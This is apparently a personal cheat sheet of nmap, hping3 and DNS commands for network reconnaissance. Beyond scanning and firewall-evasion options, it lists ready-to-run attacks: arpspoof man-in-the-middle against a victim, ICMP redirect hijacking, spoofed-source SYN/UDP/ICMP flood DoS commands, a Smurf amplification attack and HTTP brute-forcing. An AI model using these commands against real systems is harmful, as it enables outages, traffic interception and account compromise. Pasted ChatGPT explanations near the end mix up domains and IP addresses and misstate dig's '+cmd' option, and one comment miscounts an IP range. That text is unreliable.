#ARP ping,much faster than the other ping methods,
#ARP scans cannot be performed on targets that are not on local subnet
#Nmap silently overrides all other discovery options,with the other discovery options use the --disable-arp-ping option
nmap -PR 10.10.3.1 #more accurate because LAN hosts can’t block ARP requests (even if they are running a firewall)
nmap -Pn -T4 --traceroute www.target.com # find IP,reverse-DNS and traceroute scan
nmap -n 74.207.244.221 #Disable Reverse DNS Resolution, reduce scanning times – especially when scanning a large number of hosts
#Manually specify DNS servers
#useful for systems that do not have DNS configured
#prevents your scan lookups from appearing in your locally configured DNS server’s log file
#Using multiple DNS servers is often faster,especially if you choose authoritative servers for your target IP space
#improves stealth, as your requests can be bounced off just about any recursive DNS server on the Internet.
nmap --dns-servers 8.8.8.8,8.8.4.4 scanme.nmap.org
nmap -iR 10 -PS22-25,80,113,1050,35000 -v -sn #
nmap -iR 10 -sn -traceroute
# -p0- asks Nmap to scan every possible TCP port
# -A enables aggressive tests such as remote OS detection, service/version detection, and the Nmap Scripting Engine (NSE)
# T4 enables a more aggressive timing policy to speed up the scan.
nmap -p0- -v -A -T4 scanme.nmap.org
#find all machines on a network that have a certain TCP port open.
#Here is a concrete example of searching 4096 IPs for web servers (port 80 open):
#The “%D” in the filename is replaced with the numeric date on which the scan was run (e.g. “090107” on September 1, 2007)
nmap -Pn -p80 -oG logs/pb-port80scan-%D.gnmap 216.163.128.0/20
egrep '[^0-9]80/open' logs/pb-port80scan2-*.gnmap # find the machines with port 80 open
##find all machines on a network that have a certain TCP port open.
#Excluding reverse-DNS resolution by adding -n reduces the 4096-host scan time to 193 seconds
nmap -T4 -Pn -p80 --max-rtt-timeout 200ms --initial-rtt-timeout 150ms --min-hostgroup 512 -oG logs/pb-port80scan2-%D.gnmap 216.163.128.0/20
egrep '[^0-9]80/open' logs/pb-port80scan2-*.gnmap # find the machines with port 80 open
#network discovery scan with version detection
nmap -O --osscan-guess 192.168.15.1 # -O Operating system detection
nmap -O -PE 192.168.15.1
#The TCP connect scan (-sT) is the default TCP scan type when the TCP SYN scan (-sS) is not an option
#The -O option detects the operating system of the host
nmap -sT -O 192.168.122.65
nmap -sR 192.168.122.65 #Perform a RPC scan
nmap
linuxhint.com # -sV Service version detection
nmap -sV --version-trace linuxhint.com # Troubleshooting version scan
nmap -sV -sX -T4 linuxhint.com #Xmas scan Aggressive: -T4, fast scan -sV for version detection on specific ports and distinguish between filtered and filtered ports,
nmap -sO 62.233.173.90 para #IP protocol scan of a router and a typical Linux 2.4 box
nmap --open -sO 10.100.0.14
nmap -PO 192.168.1.1 # do not ping before scanning,many sites now block/filter the ping echo request packets
nmap -sS -A -P0 moonshine.ecn.purdue.edu #The ’-P0’ option (the second letter is ’zero’),do not use ping whether a machine is up
nmap -sS 192.168.1.1 # Stealthy scan
nmap 10.100.0.14 -sS -pN -n --max-rate 10000 --open -p 20,21,22,53,137,139,161,445,902,1433,3306,3389,4443,5432,5900,8080,8443,9001 #scan critical ports at fastest rate
nmap -sS 10.100.0.14 -p-
nmap -sS localhost #carry out a port scan of your own machine,The “-sS” option carries out a SYN scan
#If the target machine has the DenyHosts shield running to ward off the dictionary attacks
#-A’ option turned on, IP address may become quarantined on the target machine,assuming that port 22 is included in the range of the ports scanned
nmap -sS -A moonshine.ecn.purdue.edu #an “aggressive” SYN scan,
nmap -sT 187.36.24.156 # TCP connect scan,establish the TCP connection with the target to get the ports’ status
#Port Scanning Techniques
Open Port:
Description:
An open port indicates that a service or application actively accepts connections on that port.
It means an application is running on the target system and accessible through that port.
Nmap usually determines a port is open when it receives a SYN-ACK response during a TCP scan, or an ICMP Echo Reply during a UDP scan.
Nmap Output:
When Nmap detects an open port, it typically labels it as "open" in the scan results. For instance: PORT 80/tcp open http
Closed Port:
Description:
A closed port means that there is no service listening on that port, and attempts to connect will be met with a refusal.
Nmap Output:
Nmap labels closed ports as "closed" in the scan results. For example: PORT 23/tcp closed telnet
A closed port means there's no service listening on it.
The port is accessible, but there's no application ready to respond to connections.
Nmap typically identifies a closed port when it receives a RST (Reset) packet in response to its probes
Filtered Port:
Description:
A filtered port implies that Nmap cannot determine the port's state because it did not receive a response from the target system.
A filtered port means Nmap couldn't determine its state due to a firewall or other network device blocking probes.
It's uncertain whether the port is open or closed because the probes were prevented from reaching the target
Nmap might report a port as filtered if it receives no response, an ICMP unreachable message,
or an ICMP response indicating administrative filtering.
Possible Causes:
Filtered ports might result from firewalls, network congestion, or the target system's configuration.
Nmap Output:
If Nmap detects a filtered port, it usually labels it as "filtered" or "unfiltered."
For instance:
PORT 135/tcp filtered msrpc
PORT 22/tcp open|filtered ssh
Open Ports: They represent potential entry points into the target system and are likely running services.
Closed Ports: Typically considered safe as they don't provide entry to the system.
Filtered Ports:
These ports are in an uncertain state, making it harder to determine their accessibility.
They might be open or closed, but Nmap couldn't conclusively determine due to the lack of response
#relatively unobtrusive and stealthy since it never completes TCP connections, referred to as half-open scanning
#does not open a full TCP connection,sends a SYN packet, as if it s going to open a real connection and then wait for a response.
#A SYN/ACK indicates the port is listening (open)
#while a RST (reset) is indicative of a non-listener.
#If no response is received after several retransmissions, the port is marked as filtered.
#The port is marked filtered if an ICMP unreachable error (type 3, code 0, 1, 2, 3, 9, 10, or 13) is received
# The port is considered open if a SYN packet (without the ACK flag) is received in response,
can be due to TCP feature known as a simultaneous open or split handshake connection
Half-Open Scan (SYN Stealth Scan) TCP SYN Scan
Description: Initiates a SYN packet to the target port but does not complete the handshake,
providing information without establishing a full connection.
Sends a SYN packet and immediately checks for a SYN-ACK response without completing the handshake.
It doesn't send an RST, leaving the connection half-open.
Use Case: Faster than a full connection scan but may leave traces in target system logs.
Discerning between open and filtered ports.
Circumventing firewalls that only log full TCP connections.
Less intrusive scanning, as it doesn't fully establish connections
nmap -sS [target] nmap -sS 192.168.0.1
UDP Scan nmap -sU [target] nmap -sU 192.168.0.1
TCP FIN Scan nmap -sF [target] nmap -sF 192.168.0.1
TCP ACK Scan nmap -sA [target] nmap -sA 192.168.0.1
Custom TCP Scan nmap –scanflags [flags] [target] nmap –scanflags SYNFIN 192.168.0.1
IP Protocol Scan nmap -sO [target] nmap -sO 192.168.0.1
Send Raw Ethernet Packets nmap –send-eth [target] nmap –send-eth 192.168.0.1
Send IP Packets nmap –send-ip [target]
Xmas Scan
Description: Sets multiple TCP flags (FIN, URG, PSH) in the packet sent to the target port.
The target's response (or lack of response) indicates the port's status.
If the port is open, it might respond differently based on its state. A lack of response might indicate a closed or filtered port.
Use Case: Another evasive scanning technique that might bypass certain firewall configurations and reveal additional information.
Identifying firewall or IDS configurations.
Mapping unusual port behavior.
Fingerprinting older operating systems
nmap -sX [target] nmap -sX 192.168.0.1
Open Scan (TCP Connect Scan)
Description: It involves establishing a full TCP handshake with the target port.
If the port is open, it responds with a SYN-ACK, indicating readiness to establish a connection
Use Case: Provides reliable results but may be easily detected due to its straightforward nature.
nmap -sT [target] nmap -sT 192.168.0.1
TCP NULL Scan
Description: Sends TCP packets without any flags set (null packets) to the target port.
The response (or lack thereof) helps determine if the port is open, closed, or filtered.
Evasive scanning technique as it might not trigger some intrusion detection systems due to the absence of flags
Evading firewalls or intrusion detection systems (IDS) that might not filter null packets.
Probing systems that implement strict firewall rules.
Gathering OS fingerprinting information.
nmap -sN [target] nmap -sN 192.168.0.1
nmap -p 1-1024 -sT moonshine.ecn.purdue.edu #only the first 1024 ports
nmap -p 1-65535 localhost #Scan specific ports or scan entire port ranges on a local or remote server
nmap -p80 -sV -oG – –open 192.168.1.1/24 | grep open #search web servers
nmap -sX -T2 linuxhint.com #Xmas scan Polite: -T2, neutral.
nmap -sX -T4 linuxhint.com #Xmas scan Aggressive: -T4, fast scan
nmap 1.1.1.1 8.8.8.8 #scan multiple IP addresses
nmap 1.1.1.1,2,3,4 #scan consecutive IP addresses
nmap 8.8.8.0/28 #scan entire CIDR IP ranges, from 8.8.8.1 to 8.8.8.14
nmap 8.8.8.1-14 #from 8.8.8.1 to 8.8.8.14
nmap 8.8.8.* #scan 256 IP addresses from 8.8.8.1 to 8.8.8.256
nmap 8.8.8.* --exclude 8.8.8.1
nmap 192.168.1.0-255
nmap 192.168.1.1-255 --exclude 192.168.1.15
nmap 192.168.1.1-255 --exclude 192.168.1.1,192.168.1.2
$ cat bigmac.txt
192.168.1.1
192.168.1.254
$ nmap --exclude-file bigmac.txt 192.168.1.1-255
Perform a Fast Scan nmap -F [target] nmap -F 192.168.0.1
Scan Specific Ports nmap -p [port(s)] [target] nmap -p 21-25,80,139,8080 192.168.1.1
Scan Ports by Name nmap -p [port name(s)] [target] nmap -p ftp,http* 192.168.0.1
Scan Ports by Protocol nmap -sU -sT -p U: [ports],T:[ports] [target] nmap -sU -sT -p U:53,111,137,T:21- 25,80,139,8080 192.168.0.1
Scan All Ports nmap -p '*' [target] nmap -p '*' 192.168.0.1
Perform a Sequential Port Scan nmap -r [target] nmap -r 192.168.0.1
Scan Top Ports nmap --top-ports 20 192.168.1.106 #scan the top X most common ports for that host
#Troubleshooting And Debugging
nmap --iflist #Display Host Networking
nmap --packet-trace 192.168.1.106
nmap -e eth0 192.168.0.1 #Specify a Network Interface
nmap --open 192.168.0.1 #Only Display Open Ports
nmap --reason 192.168.0.1 #Display Port State Reason
nmap -d 192.168.0.1 #debug
#List all IPs in Subnet with Nmap
nmap -sL 8.8.4.4 8.8.8.8 74.207.244.221 # host list, 3 IPs
nmap -sL -n 192.168.1.0/30 # list the IP addresses in the target subnet -sL with no reverse DNS lookups -n
#The target list can contain hostnames, IP addresses, subnets or a range of IPs such as 192.168.1.1-5.
nmap -sL -n 192.168.2.1/32, 192.168.1.0/30 | grep 'Nmap scan report for' | cut -f 5
nmap -iL list.txt
cat list.txt
192.168.1.106
cloudflare.com
microsoft.com
securitytrails.com
nmap -oN output.txt securitytrails.com
nmap -oX output.xml securitytrails.com
nmap -iR 3 10 -PS22-25,80,113,1050,35000 -v -sn -oX out.xml | grep "Nmap" | cut -d " " -f5 > live-hosts.txt #Generate a list of the IPs of live hosts
nmap -iR 10 -n -oX out2.xml | grep "Nmap" | cut -d " " -f5 >> live-hosts.txt #Append IP to the list of live hosts
nmap -oA output.mnm securitytrails.com # -oA [path/filename],Output all supported file types
ndiff scanl.xml scan2.xml #Compare output from nmap using the ndif
ndiff -v scanl.xml scan2.xml
ndiff -xml scanl.xml scan2.xml
xsltproc nmap.xml -o nmap.html #Convert nmap xml files to html files
nmap -6 1aff:3c21:47b1:0000:0000:0000:0000:2afe #IPv6 Target
#Iptables rules to block Xmas scan
iptables -A INPUT -p tcp --tcp-flags FIN,URG,PSH FIN,URG,PSH -j DROP
iptables -A INPUT -p tcp --tcp-flags ALL ALL -j DROP
iptables -A INPUT -p tcp --tcp-flags ALL NONE -j DROP
iptables -A INPUT -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
nmap -sN 192.168.100.11 #TCP Null scan Does not set any bits (TCP flag header is 0)
nmap -sF 192.168.100.11 #FIN scan (-sF) Sets just the TCP FIN bit.
nmap -sW -T4 docsrv.caldera.com #TCP Window Scan
nmap -Pn -sSV -T4 –F 192.168.100.11 #SSL Post-processor scan,
#Filtered port,A few ports may be filtered to restrict access of the running services to a few IP addresses
nmap 192.168.100.11 #firewall presence, "filtered ports" in the output
traceroute 192.168.100.11 # asterisks (*) in the output
#evade/bypass firewall
#Source Defragmenting:not posible to send highly fragmented packets,e.g: IPTables,ensure that nmap uses raw ethernet frames
#Fragment Queuing:some firewall defrags (aka reassembles) the packets before sending them to destination,fragmentation doesn't work
nmap -f 192.168.100.11 #a fragmentation of 8 byte chunks
nmap -f -p22 192.168.100.11
nmap -ff vg-ubuntu-02 #16 byte chunks,
nmap -ff --scan-delay 10 vg-ubuntu-02 #add a delay between packets sent
nmap -mtu 24 192.168.100.11 #similar to the packet fragmentation,create 24-byte packets,MTU is multiple of 8 (8,16,24,32..)
nmap -v -sS -f -mtu 32 --send-eth --data-length 50 --source-port 8965 -T5 192.168.0.22
nmap -D RND:11 192.168.100.11 # RND generates a random and non-reserved 11 IP addresses,harder to determine from which system the scan starts
nmap -D 192.168.100.11,192.169.42.3,etc. #specify the IP addresses of the decoys
nmap -sT -Pn –-spoof-mac 0 vg-ubuntu-02 # "0" option automatically assigns random MAC for bypassing firewall
nmap -sT -PN --spoof-mac cisco vg-ubuntu-02
nmap --randomize-hosts 192.168.100.11-44 # avoid multiple port scanning detection
nmap vg-ubuntu-02 --data 0xdeadbeef #Binary data as payload
nmap vg-ubuntu-02 --data-string "nmap test"
nmap vg-ubuntu-02 --data-length 6
nmap –source-port 10 192.168.0.1
nmap --badsum 192.168.100.11 #all hosts should drop these packets,if response is received, response comes from a firewall
nmap -sI 192.168.100.11 vg-ubuntu-02 # use as zombie host (aka idle system), 192.168.100.11 is zombie,vg-ubuntu-02 is target
Nmap –Pn –sI –v 192.168.100.11 vg-ubuntu-02
#TCP ACK scan,sends acknowledgment packets instead of SYN packets
#firewall does not create logs of ACK packets as it treats ACK packets as responses to SYN packets
#The ACK scan shows unfiltered and filtered ports instead of open ones
#block unsolicited ACK packets (as sent by the Nmap ACK scan), while allowing ACK packets belonging to legitimate connections,
#firewalls must statefully watch every established connection to determine whether a given ACK is appropriate
nmap -sA -T4 scanme.nmap.org
nmap -sA -p1-100 -T4 scanme.nmap.org
nmap -sA -v -Pn 144.122.219.0/24
#NSE scripts define a list of categories
auth, broadcast, brute, default. discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, and vuln
all, auth, default, discovery, external, intrusive, malware, safe, vuln
Location: <nmap directory>/share/nmap/scripts/*
$ locate *.nse
$ nmap --script-help=scriptname #get help on which arguments may be accepted by a script
$ nmap --script-updatedb #upgrade scripts to the latest
$ nmap --script=smb-vuln-cve-2017-7494 host #check if a host is vulnerable to Eternal Blue
nmap --script banner.nse 192.168.0.1 #Individual Scripts
nmap -Pn --script banner.nse 192.168.0.1 #Individual Scripts
#The argument to --script had to be in quotes to protect the wildcard from the shell
nmap --script 'not intrusive' 192.168.0.1 #Scripts by Category
nmap --script 'default or safe' 192.168.0.1 #Multiple Script Categories
nmap -p80,443 --script http-methods scanme.nmap.org
nmap -p80,443 --script http-methods --script-args http-methods.retest scanme.nmap.org #check for the HTTP methods
#By default, the script http-methods uses the root folder as the base path ( / )
#set a different base path
nmap -p80,443 --script http-methods --script-args http-methods.urlpath=/mypath/ scanme.nmap.org
#some packet filtering products that block requests that use Nmap’s default HTTP User Agent
#use a different HTTP User Agent
nmap -p80 --script http-methods --script-args http.useragent=”Mozilla 5″ <target>
#HTTP pipelining,if the web server supports it
nmap -p80 --script http-methods --script-args http.pipeline=25 <target>
nmap --script http-open-proxy -p8080 <target> #Detecting HTTP proxies
nmap --script http-open-proxy --script-args http-open-proxy.url=http://whatsmyip.org,http-open-.pattern=”Your IP address is” -p8080 <target>
nmap --script http-enum -p80 <target> # file and directory discovery
#display all the entries that returned a status code that could possibly indicate a page exists,
nmap script http-enum http-enum.displayall -p80 — <target>
#dictionary attacks against HTTPAuth protected resources,home routers, IP webcams, and even web applications still rely on HTTP authentication
nmap -p80 --script http-brute --script-args http-brute.path=/admin/ <target>
nmap -p80 --script http-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt <target>
#some packet filtering products that block requests made using Nmap’s default HTTP User Agent.
#use a different User Agent value by setting the argument http.useragent
nmap -p80 --script http-brute --script-args http.useragent=”Mozilla 5″ <target>
#user: In this mode, for each user listed in userdb, every password in passdb will be tried.
nmap --script http-brute --script-args brute.mode=user <target>
#pass: In this mode, for each password listed in passdb, every user in usedb will be tried.
nmap --script http-brute --script-args brute.mode=pass <target>
#fcreds: This mode requires the additional argument brute.credfile.
nmap --script http-brute --script-args brute.mode=creds,brute.credfile=./creds.txt <target>
#Apache’s module UserDir provides access to the user directories by using URIs with the syntax /~username/
#perform dictionary attacks and determine a list of valid usernames on the web server.
nmap -p80 --script http-userdir-enum <target> #
#Often default credentials are found in the web applications
nmap -p80 --script http-default-accounts <target>
#identify a web application firewall/IDS
nmap --script=http-waf-fingerprint targetwebsite.com
nmap p80 --script http-waf-detect <target> #detect a Web Application Firewall or Intrusion Prevention System
nmap -p80 --script http-waf-detect --script-args=”http-waf-detect.detectBodyChanges” <target>
nmap -p80 --script http-waf-detect --script-args=”http-waf-detect.aggro” <target>
#some packet filtering products that block requests made using Nmap’s default HTTP User Agent
nmap -p80 --script http-waf-detect --script-args http.useragent=”Mozilla 42″ <target>
#Detecting XST Vulnerabilities
nmap -p80 --script http-methods,http-trace --script-args http-methods.retest <target>
#Detecting XSS Vulnerabilities
nmap -p80 --script http-unsafe-output-escaping <target>
#Detecting SQL Injection
nmap -p80 --script http-sql-injection <target>
nmap -p80 --script http-sql-injection --script-args httpspider.maxpagecount=200 <target>
nmap -p80 --script http-sql-injection --script-args httpspider.withinhost=false <target>
nmap -p80 --script http-sql-injection --script-args http.useragent=”Mozilla 42″ <target>
nmap --script smb-os-discovery.nse 10.10.10.16
#script tries to discover firewall rules using an IP TTL expiration
nmap --script=firewalk --traceroute <host>
nmap --script=firewalk --traceroute --script-args=firewalk.max-retries=1 <host>
nmap --script=firewalk --traceroute --script-args=firewalk.probe-timeout=400ms <host>
nmap --script=firewalk --traceroute --script-args=firewalk.max-probed-ports=7 <host>
#system who is using the id field or increments it when sending packets out, these systems are called "idle systems"
#case study:Port Opened
#send a SYN+ACK packet to the idle system (the printer)
#replies back with RST,ID=xx (ID=56)
#send a spoofed SYN packet to the target system (mask IP as if masked IP belongs to the printer)
#if the port is open, system sends to the printer a SYN+ACK packet,the printer replies to the target system with a RST,ID=XX+1(ID=57)
#case study:Port Closed
# send a SYN+ACK packet to the idle system (the printer)
#replies back with RST,ID=xx (ID=56)
#send a spoofed SYN packet to the target system (mask IP as if masked IP belongs to the printer)
#since the port is closed the target system does not send any packet to the printer
#send a packet to the printer, if the printer sends a packet with RST, ID=initialID+1, this means port is closed
# find a zombie machine,If the machine is a zombie, in the message: "IP ID Sequence Generation: Incremental".
nmap -O -v vg-ubuntu-02 | grep "IP ID Sequence Generation: Incremental"
# find a zombie machine,If the machine is a zombie, in the message: "IP ID Sequence Generation: Incremental".
hping3 -SA <zombie> -c 1
hping3 --spoof <zombie> -S <target> -p 21 -c 1
hping3 -SA <zombie> -c 1
----------------------------------------------------------------------------------------------------
#Scan ports 8079-8081 (-S8079-8081) through the eth0 interface (-i eth0),
#do not resolve hostnames (-n), use TCP (-pTCP) via the gateway (192.168.1.1) against the target IP (192.168.0.1)
root@kali:~# firewalk -S8079-8081 -i eth0 -n -pTCP 192.168.1.1 192.168.0.1
----------------------------------------------------------------------------------------------------
#web vulnerability scanner
uniscan -u http://192.169.42.3 -qweds
ls /usr/share/uniscan/report/
192.169.42.3.html
#set 5000 byte packet size
ping -l 5000 192.169.42.3 -n 1
#source routing
ping -j 192.169.42.3 8.8.8.8
#source routing linux-based routers
sysctl -w net.ipv4.conf.<interface>.accept_source_route=1
#FreeBSD (pfSense)
sysctls net.inet.ip.sourceroute and net.inet.ip.accept_sourceroute
----------------------------------------------------------------------------------------------------
ssldump -A -d -i eth0
ssldump -i le0 port 443
ssldump -i le0 port 443 and host 192.169.42.3
ssldump -Ad -k ~/server.pem -p foobar -i le0 host exch #decrypt traffic to to host exch server.pem and the password foobar
#wget -p https://192.169.42.3/ -O /dev/null
ssldump port 443 and host 192.169.42.3
----------------------------------------------------------------------------------------------------
#Saving fw monitor logs to a .pcap file to analyse in wireshark
#Use WinSCP to access the Security Gateway and copy the file to your local drive to analyze it in Wireshark
fw monitor -e 'accept (src=10.1.1.1 and dst=20.2.2.2) or (src=20.2.2.2 and dst=10.1.1.1);' -m iIoO -o wireshark.pcap
fw monitor -e 'accept (src=192.167.4.244 and dst=193.140.12.215) or (src=193.140.12.215 and dst=192.167.4.244 );' -m iIoO -o wireshark1.pcap
start Wireshark from the command line.
$ wireshark -r test.pcap
#scenario #1
#machine acts as a router
sysctl -w net.ipv4.ip_forward=1
arpspoof -i [Network Interface Name] -t [Victim IP] [Router IP]
arpspoof -i wlan0 -t 192.000.000.52 192.000.000.1
arpspoof -i [Network Interface Name] -t [Router IP] [Victim IP]
arpspoof -i wlan0 -t 192.000.000.1 192.000.000.52
#listens to network traffic and picks out images from TCP streams it observes
driftnet -i [Network Interface Name]
#sniffs HTTP requests in Common Log Format
urlsnarf -i [Network interface name]
----------------------------------------------------------------------------------------------------
#ICMP redirect MITM attack
/etc/sysctl.conf
net.ipv4.conf.all.accept_redirects = 0
hping3 -I eth0 -C 5 -K 1 -a 10.0.2.2 --icmp-ipdst 8.8.8.8 --icmp-gw 10.0.2.15 --icmp-ipsrc 10.0.2.16
#operating system detection w ICMP packages
hping3 -1 -c 1 –K 58 10.0.2.16 #ICMP scan
hping3 -1 [Target IP Address] -p 80 -c 5 #ICMP scan
hping3 -1 [Target Subnet] --rand-dest -I eth0 #ICMP scan,Entire subnet scan for live host
hping3 -a 10.1.1.1 -p 80 -S www.alibaba.com
hping3 -S 192.168.1.105 -p 80
hping -S 192.168.1.105 -p ++1
hping3 -S 192.168.1.105 -c 100 -p ++1
hping3 -S 192.168.1.105 -c 100 -p 21
hping3 -f 192.168.1.105 -p 80
hping3 -2 [Target IP Address] -p 80 -c 5 #UDP scan
# -d is the data payload size (here, we've designated it as 10 bytes)
# -E tells hping3 to grab data from the following file
hping3 -f 192.168.1.105 -p 80 -d 10 -E malware
# -z connects the command to the ctrl z on the keyboard so that every time we press it, the TTL is incremented by 1
# -t sets the initial TTL (in this case, we're using 1)
# -S sets the flag to SYN
# -p 80 sets the destination port to 80
hping3 -z -t 1 -S google.com -p 80
DoS using hping3 with random source IP
-c 100000 = Number of packets to send.
-d 120 = Size of each packet that was sent to target machine.
-S = I am sending SYN packets only.
-w 64 = TCP window size.
-p 21 = Destination port (21 being FTP port). You can use any port here.
--flood = Sending packets as fast as possible, without taking care to show incoming replies. Flood mode.
--rand-source = Using Random Source IP Addresses. You can also use -a or –spoof to hide hostnames. See MAN page below.
www.hping3testsite.com = Destination IP address/website name
$hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source www.hping3testsite.com
#SYN flood – DoS using HPING3
hping3 -S --flood -V www.hping3testsite.com
#-p option is used to set the remote port number for the flood
#-S option is used to set the flood type for the TCP protocol which is the sync flood
hping3 -S --flood -p 80 www.wisetut.com
hping3 --traceroute -v -1 www.wisetut.com #the traceroute feature which is used to identify the intermediate hosts between source and destination
Advanced SYN flood with random source IP, different data size, and window size
hping3 -c 20000 -d 120 -S -w 64 -p TARGET_PORT --flood --rand-source TARGET_SITE
–flood: sent packets as fast as possible
–rand-source: random source address
-c –count: packet count
-d –data: data size
-S –syn: set SYN flag
-w –win: winsize (default 64)
-p –destport: destination port (default 0)
$hping3 -S --flood -V -p TARGET_PORT TARGET_SITE
hping3 -8 0–100 -S 10.10.10.16 -V
FIN floods
$hping3 --flood --rand-source -F -p TARGET_PORT TARGET_IP
TCP RST Flood
$hping3 --flood --rand-source -R -p TARGET_PORT TARGET_IP
PUSH and ACK Flood
$hping3 --flood --rand-source -PA -p TARGET_PORT TARGET_IP
ICMP flood
$hping3 --flood --rand-source -1 -p TARGET_PORT TARGET_IP
UDP Flood
–flood: sent packets as fast as possible
–rand-source: random source address
–udp: UDP mode
-p –destport: destination port (default 0)
$hping3 --flood --rand-source --udp -p TARGET_PORT TARGET_IP
SYN flood with spoofed IP – DoS using HPING3
$hping3 -S -P -U --flood -V --rand-source www.hping3testsite.com
TCP connect flood – DoS using NPING
$nping --tcp-connect -rate=90000 -c 900000 -q www.hping3testsite.com
use routers broadcast IP address feature to send messages to multiple IP addresses
use connection-less protocols that do not validate source IP addresses.
amplification techniques;Smurf attack(ICMP amplification), DNS amplification, and Fraggle attack(UDP amplification)
Smurf Attack
This command sends ping requests to broadcast IP(10.10.15.255) by spoofing target IP(10.10.15.152).
All running hosts in this network reply to the target.
$hping3 --icmp --spoof TARGET_IP BROADCAST_IP
$hping3 --icmp --spoof 10.10.15.152 10.10.15.255
----------------------------------------------------------------------------------------------------
DNS lookups
$ whois www.alibaba.com
dig alibaba.com @8.8.8.8 #specify name server 8.8.8.8
dig @8.8.8.8 +short NS domain.com
#ChatGPT
The command you provided is using the dig utility, which stands for "domain information groper." It's a command-line tool used for querying DNS (Domain Name System) servers to retrieve DNS-related information about domain names. Let's break down the command:
dig: This is the command itself, indicating that you want to use the dig utility.
www.alibaba.com: This is the domain name you want to query for DNS information.
ANY: This is the type of DNS record you want to retrieve. The ANY type is used to request all available information for the specified domain.
+noall: This option instructs dig to exclude the default output, which provides a summary of the query.
+answer: This option tells dig to only display the answer section of the DNS response.
When you run this command, it queries the DNS server for the www.alibaba.com domain and requests all available DNS records. The response will show the DNS records associated with the domain in the answer section. These records can include information such as IP addresses, mail server addresses, and more.
Please note that the ANY query type is often not recommended due to potential security risks and the way some DNS servers respond to it. Some DNS servers may limit or filter responses to ANY queries to prevent unnecessary information disclosure.
dig www.alibaba.com ANY +noall +answer
##ChatGPT
explain why dig output misses A record :dig www.w3schools.com. +noall +answer
www.w3schools.com. 60 IN CNAME cs837.wac.edgecastcdn.net.
The output you provided indicates that the www.w3schools.com domain has a CNAME (Canonical Name) record pointing to cs837.wac.edgecastcdn.net. but does not include an A (Address) record. Let's break down what this means:
CNAME Record: The CNAME record is a type of DNS record that specifies an alias or canonical name for a domain. In this case, the CNAME record for www.w3schools.com points to cs837.wac.edgecastcdn.net.. This means that when someone tries to access www.w3schools.com, they are redirected to cs837.wac.edgecastcdn.net..
Missing A Record: The A record is used to map a domain name to an IPv4 address. It provides the actual IP address that corresponds to the domain. However, in the output you provided, there is no A record for www.w3schools.com. This suggests that the IP address associated with www.w3schools.com is not directly defined in the DNS records for that domain.
The reason for this setup could be that www.w3schools.com is utilizing a Content Delivery Network (CDN) provided by EdgeCast (now part of Verizon Media Platform). CDNs often use CNAME records to point to their servers, which then handle the distribution of content from various locations. This can improve website performance by delivering content from a server that's geographically closer to the user.
In this case, the actual IP address you might be looking for might be associated with the cs837.wac.edgecastcdn.net. domain, which the CNAME record points to. To retrieve the IP address associated with cs837.wac.edgecastcdn.net., you could perform a dig query specifically for that domain:
dig cs837.wac.edgecastcdn.net. A +noall +answer
This query should provide you with the A record containing the IP address associated with the EdgeCast CDN server.
#Find Out TTL Value Using dig
dig +nocmd +noall +answer a www.alibaba.com
#Find Domain SOA Record
$ dig +nssearch www.alibaba.com
#Display All Records
$ dig +noall +answer www.alibaba.com any
#Get Only Short Answer
$ dig +short www.alibaba.com
#Trace Domain Delegation Path
# perform a trace of the DNS resolution process for the domain name "www.alibaba.com".
$ dig +trace www.alibaba.com
------------------------------------------------------------------------------------------
$ dig +trace www.alibaba.com
; <<>> DiG 9.18.4-2-Debian <<>> +trace www.alibaba.com
;; global options: +cmd
. 86067 IN NS b.root-servers.net.
. 86067 IN NS c.root-servers.net.
. 86067 IN NS d.root-servers.net.
. 86067 IN NS e.root-servers.net.
. 86067 IN NS f.root-servers.net.
. 86067 IN NS g.root-servers.net.
. 86067 IN NS h.root-servers.net.
. 86067 IN NS i.root-servers.net.
. 86067 IN NS j.root-servers.net.
. 86067 IN NS k.root-servers.net.
. 86067 IN NS l.root-servers.net.
. 86067 IN NS m.root-servers.net.
. 86067 IN NS a.root-servers.net.
;; Received 824 bytes from 172.166.63.12#53(172.166.63.12) in 4 ms
#ChatGPT
This is the output of the "dig +trace www.alibaba.com" command, which is used to trace the DNS resolution process for the domain name "asbu.edu.tr". Here's a breakdown of the output:
"; <<>> DiG 9.18.4-2-Debian <<>> +trace asbu.edu.tr" - This line indicates that the dig command is being used to perform a trace of the DNS resolution process for the domain name "asbu.edu.tr".
";; global options: +cmd" - This line indicates that the global option "+cmd" is being used, which enables the execution of commands specified on the command line.
"." - This line indicates the root DNS server, which is the starting point of the DNS resolution process.
"IN NS" - This line indicates that the DNS server is a name server.
"a.root-servers.net." - This line indicates the name of the DNS server.
"Received 268 bytes from 174.166.63.12#53(174.166.63.12) in 124 ms" - This line indicates that the previous response was received from the DNS server with IP address "172.16.3.2" and that it took 124 milliseconds to receive the response.
The output will continue to show the authoritative DNS servers for each level of the domain hierarchy until it resolves the IP address for the domain name "asbu.edu.tr". The final output will show the IP address of the domain name once it has been successfully resolved.
------------------------------------------------------------------------------------------
$ dig -x 217.168.240.132
$ dig +noall +answer -x 217.168.240.132
$ dig -x 193.140.80.208 +short
$ dig -x 193.140.80.208 +trace
check if your mail servers direct correctly
$dig your_domain_name.com MX
check if "A" records are set correctly
$dig your_domain_name.com
Get TTL Information
$ host -v -t {TYPE} {example.com}
host -t any www.alibaba.com
host -t ns www.alibaba.com #query (DNS) for information about the name servers associated with the domain name "www.alibaba.com
Find Out the Domain IP
$ host -v -t a cyberciti.biz
Find Out the Domain Mail Server
$ host -v -t mx cyberciti.biz
$ host -v -t soa cyberciti.biz
Find Out the Domain Name Servers
$ host -v -t ns cyberciti.biz
$ host -a www.alibaba.com
Find Out the Domain CNAME Record
$ host -t cname files.cyberciti.biz
Query Particular Name Server
$ host www.alibaba.com ns1.www.alibaba.com
Find Out the Domain TXT Recored (e.g. SPF)
$ host -t txt www.alibaba.com
Reverse DNS lookup
$host 217.168.240.132
$host -v -t ptr 75.126.153.206
#FW trick
#By default, host command uses UDP protocol,Pass the -T option to use a TCP connection when querying the name server.
#see if the name server works over TCP and firewall allows queries over the TCP
host -t cname files.cyberciti.biz
#change the default timeout to wait for a reply using -timeout option.
nslookup -timeout=10 redhat.com
nslookup -debug redhat.com
nslookup -type=any www.alibaba.com
#By default DNS servers uses the port number 53. If the port number changes
nslookup -port 56 redhat.com
specify a particular name server to resolve the domain name, ns1.redhat.com as the DNS server, ns1.redhat.com has all the zone information of redhat.com
